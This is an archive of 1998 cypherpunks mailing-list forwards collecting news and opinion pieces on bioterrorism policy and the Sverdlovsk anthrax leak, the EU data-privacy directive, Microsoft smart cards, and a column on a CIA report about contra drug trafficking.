 Sawyer asked him. "The entire population of Earth several times," he
replied. ABC
 generously shared Alibek with the New York Times, which, in return, promoted
 Sawyer's show on its front page with an interview with the former Soviet
 scientist--including a warning (not mentioned by Sawyer) that Alibek was
considered
 by US intelligence to be credible about the "subjects he knows
firsthand...[but] less
 reliable on political and military issues." 

 Sawyer's search for Soviet malfeasance took her to Ekaterinburg (formerly
the Soviet
 city of Sverdlovsk), where, in 1979, an accidental release of anthrax
spores from a
 Soviet military compound killed more than sixty people. After reports of
the accident
 reached the West through Soviet migrs, Moscow claimed the deaths were
because
 of anthrax-tainted meat (anthrax is endemic in the region). Matthew
Meselson, the
 Harvard molecular biologist and the scientist who was instrumental in
persuading
 Nixon to outlaw biological weapons in 1969, led a team of investigators to
 Sverdlovsk. In 1994 Meselson proved in an article in Science, the journal
of the
 American Association for the Advancement of Science, that in fact there
had been a
 release of anthrax spores from the military compound, and he confirmed
nearly seventy
 deaths. 

 But Sawyer, who spent four months researching the show, never interviewed
 Meselson or anyone from his team, including Jeanne Guillemin, a
sociologist at Boston
 College who had cross-checked a Russian casualty list with hospital
records, local
 interviews and grave sites. Instead, Sawyer referred to an unnamed
director of a
 Sverdlovsk military hospital as saying there had been 259 victims--but not
how many
 of the victims had died. Sawyer's staff called Professor Meselson the
night before the
 program aired, but merely to ask his help with the pronunciation of a
number of drugs
 used to treat the victims: penicillin, cephalosporin, chloramphenicol and
 corticosteroids. 

 In a further effort to suggest that more spookiness was afoot, Sawyer
recorded that at
 the end of 1997 Russian scientists had published a paper in the British
medical journal
 Vaccine describing the creation of a genetically engineered anthrax strain
that was
 resistant to standard Russian anthrax vaccine. "Might the Russians be
creating germs
 that can resist vaccines?" asked Sawyer. But was there really anything
sinister about
 the Russian work? Were the Russian experiments threatening a new kind of
 catastrophic terrorism, or were Russian scientists simply studying the
lethality of
 anthrax, which is endemic in Russia? 

 Sawyer didn't mention that Western intelligence had known about the new
anthrax
 strains for almost two years--from an unclassified International Workshop
on Anthrax
 held at Winchester, England, in September 1995. The Russian scientists had
openly
 described their experiments at the meeting sponsored by a number of
commercial,
 charitable and professional organizations independent of the US and British
 governments. 

 Bioterrorism, biocriminals, bioweaponeers--all good buzzwords for
novelists and
 movie makers who will continue to sound alarms and attract influential
followers, no
 doubt; but the fact is, there have been only two serious uses of
biological weapons in
 this century: one by the Japanese Imperial Army against China, and the
other a failed
 attempt by Aum Shinrikyo to disperse anthrax spores. 

 So if there are terrorists out there wanting to use biological or chemical
or nuclear
 weapons, how good is our intelligence about them? In hearings before
Congress in
 1995 the CIA admitted that its terrorism intelligence desk somehow missed
the 1994
 sarin gas attack by Aum Shinrikyo in Matsumoto, which killed seven
people--although
 the event had been reported in the Japanese and European press and even in
the
 US-owned International Herald Tribune. Such revelations suggest that a new,
 multi-agency National Intelligence Center, as proposed by Deutch et al. in
Foreign
 Affairs, might not only be a good idea but a necessity. But why a whole new
 bureaucracy? Why the Manhattan Project syndrome? The Aum Shinrikyo story
 suggests that a small band of well-trained researchers who tap into
publicly available
 information could be as useful as national information centers, wiretaps
and grand jury
 investigations. 

 The risk in rushing to meet the new threat--any new threat--with new
departments of
 counter-espionage and counter-weapons is that the old art of deterrence
through
 international treaties will take a back seat. The United States already
has a policy that
 criminalizes terrorist activity at home, including the postOklahoma City
 Anti-Terrorism Act of 1996. It also supports sanctions against countries
promoting
 terrorism and corporations exporting material that could be used to
produce weapons
 of mass destruction. 

 In the article on catastrophic terrorism, Deutch et al. mention the
proposal of Harvard
 professor Meselson and his law professor colleague, Philip Heymann, for an
 international convention making it a crime for individuals to engage in
the production of
 biological or chemical weapons. The existing chemical and biological
conventions
 apply only to states. The idea is to deter national leaders, such as
Saddam Hussein,
 and groups such as Aum Shinrikyo, from seeking to develop chemical or
biological
 weapons, and to discourage corporations from assisting them because the
scientist or
 the CEO could be arrested. If such a treaty had existed and been supported
by the
 United States in the eighties when Iraq was using poison gas and
developing biological
 weapons, the suppliers and advisers on whom Saddam depended could have been
 brought to trial. 

 The proposal is being co-promoted by Meselson's longtime ally in the fight
to eliminate
 chemical and biological weapons, Julian Perry Robinson of the University
of Sussex in
 England. The crimes are carefully defined in the precise language of the
chemical and
 biological conventions, now ratified by 120 and 141 countries
respectively. Under the
 proposed law any nation that is party to the existing conventions would be
bound
 either to prosecute or to extradite a violator. Such treaties already in
effect are aimed
 at piracy, genocide, airline hijacking and harming diplomats on active
duty. If the
 proposal becomes law, terrorists would have their support group cut from
under them;
 there is even the suggestion of a reward for anyone who provides
information leading
 to a perpetrator's arrest. Maybe the fiction writers will pick up the idea
too. Then, who
 knows whether the FBI or some adventurer from the plaintiff's
bar--bringing, say, a
 class action on behalf of aggrieved shareholders of a company caught
trading in
 anthrax--will be the first to be responsible for the arrest of the
culprits? The next
 generation of terror novels should be filled with "biocriminals" and
"chemothugs." 

 For an alternative view, and relief from the drumbeat of the New Threat
merchants,
 one can turn to this quarter's Foreign Policy, a rival of Foreign Affairs.
In an article
 titled "The Great Superterrorism Scare," Ehud Sprinzak, a professor of
political
 science at Jerusalem's Hebrew University, suggests that the voices of doom
are
 mistaken. Their concept of postcold war chaos breeding terrorist fanatics
is simply
 not supported by the evidence of three decades. "Despite the lurid
rhetoric, a massive
 terrorist attack with nuclear, chemical, or biological weapons is hardly
inevitable. It is
 not even likely," he writes. "Terrorists wish to convince us that they are
capable of
 striking from anywhere at any time, but there is really no chaos. In fact,
terrorism
 involves predictable behavior, and the vast majority of terrorist
organizations can be
 identified well in advance." Such views tend to go unheard by doomsayers. The
 Republicans added $9 billion to the military budget, including several
additional millions
 for antiterrorism projects, by emphasizing unpreparedness--sure to be a
big issue in
 Election 2000. 

---
 Peter Pringle, a British journalist, reported on the end of the cold war from
 Washington and Moscow for The Independent of London. 

Join a discussion in the Digital Edition Forums. 
 Or send your letter to the editor to letters@thenation.com. 

The Nation Digital Edition http://www.thenation.com 

 Copyright (c) 1998, The Nation Company, L.P.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 28 Oct 1998 11:36:16 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Europe May Block Flow of Internet Data With US
Message-ID: <199810280309.TAA27103@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Europe May Block Flow of Internet Data With US
Date: Mon, 26 Oct 1998 09:45:04 -0600
To: believer@telepath.com

Source:  Christian Science Monitor
http://www.csmonitor.com/todays_paper/reduced/today/intl/intl.3.html

International - Monday October 26, 1998 

Europe May Block Flow of Internet Data With US 
Peter Ford, Staff writer of The Christian Science Monitor 

PARIS -- Radically different American and European notions of privacy and
how to protect it are
threatening to curb the worldwide boom in electronic commerce. 

New European Union rules governing international transfers of personal data
over the Internet go
into effect today. They commit EU governments to strict new privacy
standards in electronic
databases storing citizens' personal details. And they oblige governments
to block data transfers to
countries that fail to uphold "adequate" privacy provisions. 

That, in the European Commission's view, includes the United States.

Year-long efforts by senior US negotiators to convince the EU otherwise
have shown how "in
Europe, privacy is seen as a human right ... while the Americans are saying
that the market should
look after it," says Christiaan van der Valk, an expert in electronic
privacy issues with the
Paris-based International Chamber of Commerce.

Unless European and US negotiators reach agreement, the EU directive "could
have pretty severe
long-term effects, hindering the extension of e-commerce and the
globalization of industry generally,"
warns IBM spokeswoman Armgard von Reden.

The new rules give European citizens the right to access personal data held
on them by private
corporations and to correct it if it is false. Individuals must give
consent to the processing of sensitive
data such as medical records or details of ethnicity.

Web-site operators routinely capture personal information about users who
visit their sites and sell it
to direct marketing companies and other clients. "Privacy safeguards in the
United States have not
kept up to date," argued Marc Rotenberg, a teacher of privacy law at
Georgetown University in
Washington, in testimony to the US House of Representatives earlier this year.

If data protection officials in European countries were to start forbidding
the transfer of personal
data to the US this week, or demanding individual notification of such
transfers from data
processors, "everything would grind to a halt," says Philip Jones,
assistant registrar at Britain's Data
Protection Registry, a government body.

Every day companies such as airlines, banks, and insurance firms transfer
millions of bits of
information - like names, addresses, and phone numbers - on clients or
potential customers. 

But "nobody is going to go down to some basement in European Union
headquarters to throw a
switch that will shut off all data flows on Monday morning," adds Professor
Rotenberg.

Only a handful of the 15 EU countries have passed the legislation to
implement the Commission's
directive. The Commission is still negotiating with the US on how the rules
will be enforced.

Washington, reluctant to legislate, is seeking EU approval for a voluntary
system. US companies
wishing to process Europeans' personal information would adhere to a set of
principles laid down
by the Department of Commerce. How they would be enforced, however, and how
European
citizens could seek redress for any grievances, is not yet clear.

Alternatively, US negotiators are suggesting companies could join systems
such as the Online
Privacy Alliance, set up by IBM and Time-Warner, among others. Members
commit themselves to
respect the alliance's privacy standards and to submit to checks by
Trust-e, an independent
verification organization.

Data-importing companies in the US could also sign contracts with the
exporter, pledging to treat
information with the same degree of confidentiality it would enjoy in
Europe. "Most global
companies are heading in this direction," says Ms. von Reden. 

EC officials were to meet European representatives today to discuss the
American proposals and
Washington's request for a 90-day extension of the application of the new
rules. Nobody expects
dramatic changes this week, but privacy activists are expected to test the
directive as soon as it
comes into force by laying a complaint against a high-profile company such
as Visa International or
Citigroup.

At the moment, says one executive with an international financial services
group, "I am not sure that
anyone can say how this is all supposed to work in real life." 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 28 Oct 1998 11:37:47 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [FP] Microsoft puts smart card on table
Message-ID: <199810280309.TAA27119@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ScanThisNews" <mcdonalds@airnet.net>
Subject: IP: [FP] Microsoft puts smart card on table
Date: Mon, 26 Oct 1998 19:56:43 -0600
To: ignition-point@majordomo.pobox.com


SCAN THIS NEWS
10/26/98


Microsoft puts smart card on table

http://www.news.com/News/Item/0%2C4%2C27923%2C00.html?dd.ne.tx.fs6.1026

By Tim Clark
Staff Writer, CNET News.com
October 26, 1998

Update: Microsoft tomorrow will announce an extension of its Windows
operating system for smart cards, a company spokesman said today.

Smart cards, which have very limited memory and processing power, are about
the size of a credit card and embedded with a computer chip. The technology
is used for storing data on mobile phones, banking online, and paying for
phone calls and public transit fares.

Microsoft vice president Paul Maritz is scheduled to announce the operating
system initiative tomorrow at Cartes 98, a conference on smart card
technology in Paris.

A new system from Microsoft could bring more acceptance of smart cards in
the United States. Smart cards have been used in Europe, which holds more
than 80 percent of the market, but have been slow to progress in America, at
least in part beacuse of the lack of a standard operating system.

Microsoft is bidding to enter that arena, but Sun Microsystems is already
active in that space with its JavaCard specification. In addition, Mondex,
an e-cash company controlled by MasterCard has its MultOS system designed so
cards with different operating systems can work together.

The company's interest in smart cards parallels its strategy with Windows
CE, a stripped-down version of its PC operating system for consumer
electronics devices. In April, Microsoft announced a version of Windows CE
for automobiles, gas pumps, industrial controllers, and other uses.

The smart-card initiative seeks to go after even smaller, cheaper
devices--particularly when rival Sun is targeting the same business. The
Microsoft spokesman said card developers could use existing Windows tools to
work with their software.

The annual Paris show is a major showcase for the smart card industry.
Schlumberger, a major French manufacturer of smart cards, today unveiled new
software for its cards that transforms a smart card into a security device
to identify its holder.

Many PC makers have said they will produce machines with smart-card readers
built in, a capability that Microsoft has provided in its desktop PC
operating systems. Microsoft has a certification and logo program that
indicates smart card systems work with Windows NT.

=======================================================================
Don't believe anything you read on the Net unless:
1) you can confirm it with another source, and/or
2) it is consistent with what you already know to be true.
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================




****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 28 Oct 1998 11:36:49 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 5.68: No Data Flow Disruption Between EU & US--at Least for Now
Message-ID: <199810280309.TAA27131@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 5.68: No Data Flow Disruption Between EU & US--at Least for Now
Date: Tue, 27 Oct 1998 02:33:46 -0800
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 5.68: No Data Flow Disruption Between EU & US--at Least for Now.
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Tuesday October 27, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: CNET News.com, October 25, 1998
http://www.news.com

European privacy deadline nears
http://www.news.com/News/Item/0,4,27920,00.html

By
Tim Clark
Staff Writer, CNET News.com

The European Union will not disrupt the flow of data between Europe and the
United States, even though strict new privacy protections took effect in
Europe yesterday, a key Commerce Department official said today.

The new European Union privacy directive prohibits sending personal data to
nations whose privacy protections aren't as vigorous as in the 15-country
bloc, but Commerce undersecretary David Aaron said today that the Europeans
have agreed to open formal negotiations on how U.S. firms can comply with
it.

U.S. diplomats have been discussing the issue with the European Commission
for six months, in talks described as discussions rather than as
negotiations.

"We believe we can reach a resolution, and we think it is imperative that
we do so promptly," Aaron said, naming December 15 as a target to close the
matter.

"The U.S. premise is that the United States has effective privacy
protection but that the approach here is different than in Europe," he
said. "We will seek an arrangement that provides a workable framework on
both sides of Atlantic, where data will be secured and disruption of
transatlantic data flows will be avoided."

The EU's privacy directive, if enforced, could prevent database marketing
firms, Web sites, U.S. firms with European employees, and credit card
companies from sending personal data back to the United States. That's
because the privacy directive bars export of data to nations whose
protection of personal data is not certified to be as strong as Europe's.

The issue remains a sticking point despite earlier hints from the White
House that the problem would be settled by now.

Months of discussions have led U.S. officials to hope that the private
sector-led approach favored by the Clinton administration can be reconciled
with strict privacy laws in many European nations.

The United States is proposing a concept dubbed "safe harbor:" In the
absence of U.S. privacy legislation, American firms could voluntarily
adhere to a set of privacy practices such as those from TRUSTe
http://www.truste.org/ ], the business-backed U.S. privacy group pushing
voluntary privacy guidelines on the Internet. The U.S. and the European
Union will negotiate as to the content of privacy guidelines that would be
considered acceptable protections to allow U.S. firms to send personal data
on individuals from Europe to the United States.

"If companies did that, privacy protections would be considered 'adequate,'
and there would be a presumption that data would be able to flow," the U.S.
official said.

TRUSTe executive director Susan Scott has spoken favorably in recent weeks
about the safe harbor concept, and she outlined the idea to the Europeans
earlier this year.

But privacy law advocate Marc Rotenberg, executive director of the
Electronic Privacy Information Center, isn't sure the safe harbor concept
will fly.

"The U.S. had been saying there was going to be some big agreement, but
there isn't one," said Rotenberg, who favors strong U.S. privacy laws. "So
there is still a question as to whether U.S. firms will be blocked by the
EU directive."

Copyright (c) 1995-98 CNET, Inc.

--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you are concerned about the erosion
of your privacy in general, won't you please help us continue this
important work by becoming an "ISPI Supporter" or by taking out
an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.








****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 28 Oct 1998 11:36:38 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 5.69: EU Law Aims to Protect Privacy of Personal Data
Message-ID: <199810280309.TAA27142@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 5.69: EU Law Aims to Protect Privacy of Personal Data
Date: Tue, 27 Oct 1998 02:34:54 -0800
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 5.69: EU Law Aims to Protect Privacy of Personal Data
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Tuesday October 27, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: The New York Times, October 26, 1998
http://www.nytimes.com

European Law Aims to Protect Privacy of Personal Data
http://search.nytimes.com/search/daily/bin/fastweb?getdoc+site+iib-site+45+
0+wAAA+privacy

By
EDMUND L. ANDREWS

FRANKFURT, Germany -- The European Union put into effect a law Sunday
prohibiting U.S.-style buying and selling of personal data, a move that
could interrupt electronic commerce with the United States if the two sides
fail to resolve deep philosophical and legal differences over protecting
privacy.

The goal of the European law is to prohibit companies from using
information about their customers in ways the customers never intended --
for example, selling it to other companies for use as a marketing tool.

The new law affects an enormous range of information that companies collect
about people in the course of daily business, from credit-card transactions
to magazine subscriptions to telephone records, as well as the electronic
footprints that people leave when they visit sites on the World Wide Web.

The law was adopted three years ago by the European Union after a majority
of its 15 member nations agreed to issue what is known as a directive.
Under European law, each member nation is required to implement the
directive by enacting its own law. Six nations have drafted or passed such
laws so far.

Beyond its impact on Europe, the directive has the potential to disrupt
electronic commerce with the United States. A key provision of the new
measure would prohibit any company doing business in the European Union
from transmitting personal data to any country that does not guarantee
comparable privacy protection -- foremost among them, at this point, the
United States.

American direct-marketing companies, which make money buying, selling and
developing business strategies based on huge data banks of personal
information about consumers, have lobbied hard against government
regulation of their industry. As a result, the Clinton administration has
adopted a more laissez-faire approach under which data industries would be
allowed to police themselves through self-regulatory organizations.

U.S. officials say they agree with Europe on the basic principle that
privacy should be protected but they have big differences about the best
way to carry it out.

"They have privacy czars and bureaucracies, and that kind of top-down
approach would probably be regarded as a violation of privacy rights by
many people in the U.S.," David Aaron, undersecretary of commerce, said of
European nations.

Aaron, who held talks on the issue with European officials in Brussels,
Belgium, earlier this month, added, "We say, 'Let's create a situation
where, if companies agree to follow certain data practices, they can be
held harmless under the new directive."'

If the issue, which neither side paid much attention to until a few months
ago, is not resolved, European officials could theoretically soon begin to
block trans-Atlantic data transfers by multinational corporations and the
growing number of Internet companies.

European officials say they have no plans for any blockades soon, and are
hopeful about reaching a peaceful resolution. Officials from the United
States and Europe say they held constructive positive discussions earlier
this month. The European Commission has scheduled a meeting on the issue
for Monday, and it is expected to seek some kind of temporary solution
while the two sides negotiate.

Underlying the debate is a deeper political issue that is fraught with
cultural baggage. For years, European nations have been far tougher than
the United States about protecting privacy. Many countries essentially ban
telephone marketing to people's homes, and that prohibition is now being
applied to unsolicited sales approaches by fax and e-mail.

Several nations, including Germany and the Netherlands, have government
agencies devoted exclusively to protecting personal data.

Acting as ombudsmen, these agencies investigate complaints from individuals
who believe that companies have mishandled information about them.
Companies that are accused of violating privacy laws can be prosecuted
under criminal laws.

"There is a great difference in attitudes about privacy protection between
Europe and the United States," said Ulrich Sieber, a law professor at the
University of Wuertzburg in Germany.

U.S. privacy laws are far more lax and consist of a hodgepodge of statutes
and regulations enforced by various state and federal agencies charged with
oversight of other industries, like, for instance, those that regulate
banks.

In sharp contrast with Europe, an entire industry has arisen in the United
States that specializes in trolling public and private sources for vast
quantities of personal information, like birth records, drivers' license
numbers and torrents of data accumulated by retailers about customers'
individual purchases.

The new European directive embraces several basic principles that national
governments must now translate into their own laws. It requires that
companies tell people when they collect information about them and disclose
how that information will be used. In addition, customers must provide
informed consent before any company can legally use that data.

The law also requires companies to give people access to information about
themselves.

U.S. officials say they agree with those requirements in principle, but
disagree with giving people unconditional access to information about
themselves, saying access should be allowed only if it is reasonable or
practical to do so.

The more difficult issues are enforcement and policing. Aaron says the
United States wants to give companies a variety of "safe harbors" to
satisfy privacy protection. One idea is to create independent
self-regulatory organizations that would monitor a company's data practices
and would give well-behaved companies what amounts to a stamp of approval.

Another option, they say, should be for companies to deal directly with
European officials and demonstrate that their systems and practices are
appropriate.

But legal experts say the new law could easily take on a life of its own,
because it gives individuals and private organizations the right to sue
companies that they say fail to provide adequate privacy protections.

Industry and government officials worry that independent privacy advocates
in Europe will simply invoke the letter of the law and begin taking U.S.
companies to court.

"I'm not sure the idea of creating safe harbors will be practical, because
people can still go ahead and sue a company regardless of whether the
governments reach an agreement among themselves," said Christopher Kuner, a
lawyer in Frankfurt who specializes in European information law.

In the short term, government and industry officials predict that nothing
much will happen. Most countries have yet to implement their own laws to
carry out the directive. And several countries, including Germany, have had
tough laws in place for years, and companies have found ways to deal with
the requirements.

One of the pioneering cases in Germany involved Citibank, which ran afoul
of German data-protection authorities in 1995. But since Citibank, which
has a major business presence in Germany, demonstrated to government
officials there how its system protected data in the United States, it has
operated without conflicts.

Executives of American Express Co. said they had reached similar agreements
in many countries and that they believed they could live with the new
directive. "It is a crucial issue for us, but it has not been a burden so
far," said James Tobin, an American Express spokesman in London.

John Borking, vice president of the Data Protection Authority of the
Netherlands, said, "We are not information police, and I expect that in the
whole of Europe nothing will happen."

But, added Borking, European governments will always take privacy
protection seriously.

"We are at the beginning of a new information society, and no one really
knows the outcome," he said. "But privacy and trust are important parts of
this society."

Copyright 1998 The New York Times Company

--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you are concerned about the erosion
of your privacy in general, won't you please help us continue this
important work by becoming an "ISPI Supporter" or by taking out
an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.









****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 28 Oct 1998 11:37:35 +0800
To: cypherpunks@cyberpass.net
Subject: IP: CIA admits drug trafficking, cover-up
Message-ID: <199810280309.TAA27153@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: CIA admits drug trafficking, cover-up
Date: Tue, 27 Oct 1998 09:43:07 -0600
To: believer@telepath.com

Source:  WorldNetDaily
http://www.WorldNetDaily.com/ronthal/981027.comlr.shtml

CIA admits drug trafficking, cover-up 
 
COPYRIGHT 1998 WorldNetDaily 
  
This isn't the CIA report you may be thinking of, the
one from last January in which that agency swore up
and down it "could find no evidence" for any
contra-drug ties. No. This is the other one --
Volume 2, dated October 8, 1998. The one in
which the CIA quietly, quietly admits it allowed
cocaine to be exported and sold to American
citizens to help fund the contras. 

Back in March, the CIA's Inspector General, Fred
Hitz, told Congress that the CIA had maintained
relationships with companies and individuals that it
knew to be involved in the drug business, and
furthermore, that the CIA had received from the
Justice Department clearance not to report any
knowledge it might have of drug-dealing by CIA
assets. Here's ample evidence for the latter at least:
random highlights from the report include "Exclusion
of Narcotics Violations from Scope of Reportable
Non-employee Crimes" -- "DoJ and CIA discussed
the issue of whether narcotics violations should be in
the list of reportable crimes and the parties arrived
at an understanding where CIA would only report
'serious, not run-of-the-mill, narcotics violations.' ...
According to Cohen, CIA's main concern was the
collection of intelligence on narcotics, not law
enforcement." There's also some Clintonesque
toe-twisting about the exact definition of "employee"
here: 

 Between August 15, 1979 and March 2,
 1982, CIA was required by the April 15,
 1979 Attorney General's guidelines under
 E.O. 12036 and HN 7-39 to report to DoJ
 any narcotics trafficking allegations relating to
 individuals, assets, or independent
 contractors who were associated with the
 Contras because assets and independent
 contractors were considered "employees" for
 crimes reporting purposes. As of March 2,
 1982, the terms of the 1982 CIA-DoJ
 Crimes Reporting MOU under E.O. 12333
 no longer required that CIA report to DoJ
 narcotics trafficking allegations regarding
 individuals, assets, or independent
 contractors associated with the Contras
 because assets and independent contractors
 were not considered "employees" for crimes
 reporting purposes. 

Note also recollections of "remarks by CATF chief
Alan Fiers (who had direct responsibility for
management of the Nicaraguan and Central
American programs) to the effect that there had
been some credible reporting of narcotics trafficking
in the Southern Front (Costa Rica)." 

In short, here's vindication for journalist Gary Webb
after all -- despite his regrettable subsequent
co-optation by and collaboration with the
conspiracy theorists of the left, who claimed the
introduction of drugs into the inner cities was itself a
deliberate racist-genocidal government policy. Want
more? Read the report; read Webb's original book
, though it's sadly marred by the Maxine Waters
introduction; read, also, Whiteout by Alexander
Cockburn and Jeffrey St. Clair, which covers not
only the CIA's drug trafficking involvement, but the
campaign to discredit Webb as well -- it's the book
the CIA doesn't want you to read. 

It really IS the economy, stupid 

In political philosophy, there's a fine line between
the visionary innovator and the cryptoutopian
crackpot. The Economic Government Group
pushes that line. Formed out of concern that "the
freedom movement was focused too closely on
devising ways to minimize the state and not enough
on developing workable alternatives to it," it works
to let the marketplace become the means by which
government is created and maintained. Its Web site,
Economic.net , carries not one but two
introductions to its occasionally loony, but
occasionally blisteringly creative ideas; I
recommend Stephen H. Foerster's good
straightforward summary of this take-no-prisoners
free-market philosophy. Fans of the book The
Sovereign Individual by J. Davidson and W.
Rees-Mogg may find affinities here. 

Capitalistic self-regulation now in progress 

Its familiar branded online seal is displayed on more
and more reputable merchants' Web sites; its own
site offers a variety of privacy resources for both
Web publishers and Web users. TRUSTe seeks to
build users' trust and confidence on the Internet and,
in doing so, accelerate growth of the Internet
industry -- all based on a strong understanding of
the fact that no single privacy principle is adequate
for all situations. Government regulation of the
Internet would likely be more rigid, ham-handed,
costly to implement, and difficult to repeal than an
industry- regulated program such as TRUSTe's. If
you sell stuff on the Internet, or know someone who
does, using and encouraging the use of TRUSTe
just might be doing Web commerce a big favor. 

The forgotten point of the military 

The relatively high levels of defense spending today
belie serious gaps in our military preparedness.
